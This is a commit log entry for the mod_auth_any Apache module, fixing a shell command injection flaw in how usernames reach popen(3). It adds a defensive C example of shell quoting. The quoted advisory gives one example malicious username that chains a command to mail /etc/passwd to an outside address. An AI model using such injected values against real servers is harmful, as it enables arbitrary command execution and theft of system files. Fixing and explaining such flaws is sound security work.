Commit found by message id
Tue, 25 Mar 2003
[ 04:23:11 lioux ] mod_auth_any (www): Apache module to use any command line program to authenticate a user
o Fix vulnerability that allows execution of arbitrary commands on
the server with the uid of the apache process. Background:
"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail firstname.lastname@example.org</etc/passwd")
"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
o Fix this by adding an escaping function from . Then, modifying
this function appropriately with ideas from . Apply the new
escaping code to mod_auth_any.
o Bump PORTREVISION
Submitted by: Security Officer (nectar),
Red Hat Security Response Team <email@example.com> 
Obtained from: mod_auth_any CVS ,
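
The quoting the commit message describes, as an added example that is not mod_auth_any's code or the committed patch: every client-supplied value becomes one single-quoted shell word, with embedded quotes escaped, before the command line reaches popen(3). The helper names `shell_quote` and `build_auth_cmd`, the authenticator path and the sample inputs are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not from mod_auth_any): write `in` to `out` as one
 * single-quoted POSIX shell word. Inside '...' the shell interprets nothing,
 * so only ' itself needs handling: close the quote, emit \', reopen.
 * Returns the length written, or -1 if `out` is too small. */
static int shell_quote(const char *in, char *out, size_t outsz)
{
    size_t n = 0;
    if (outsz < 3) return -1;                /* room for '' and NUL */
    out[n++] = '\'';
    for (; *in; in++) {
        size_t need = (*in == '\'') ? 4 : 1;
        if (n + need + 2 > outsz) return -1; /* keep room for closing ' and NUL */
        if (*in == '\'') { memcpy(out + n, "'\\''", 4); n += 4; }
        else out[n++] = *in;
    }
    out[n++] = '\'';
    out[n] = '\0';
    return (int)n;
}

/* Build the command line that would be handed to popen(3). `prog` is the
 * administrator-configured authenticator path and is trusted; user and
 * password come from the web client and are always quoted. Returns 0 or -1. */
static int build_auth_cmd(const char *prog, const char *user, const char *pass,
                          char *cmd, size_t cmdsz)
{
    char qu[512], qp[512];
    if (shell_quote(user, qu, sizeof qu) < 0) return -1;
    if (shell_quote(pass, qp, sizeof qp) < 0) return -1;
    int n = snprintf(cmd, cmdsz, "%s %s %s", prog, qu, qp);
    return (n < 0 || (size_t)n >= cmdsz) ? -1 : 0;
}

int main(void)
{
    char cmd[1200];
    /* Constructed input shaped like the username quoted in the message. */
    if (build_auth_cmd("/usr/local/bin/authcheck", "foo&mail x</etc/passwd",
                       "it's", cmd, sizeof cmd) == 0)
        puts(cmd);
    return 0;
}
```

Passing the credentials to the helper program over a pipe or via an exec-family call, with no shell involved, removes the need for quoting altogether.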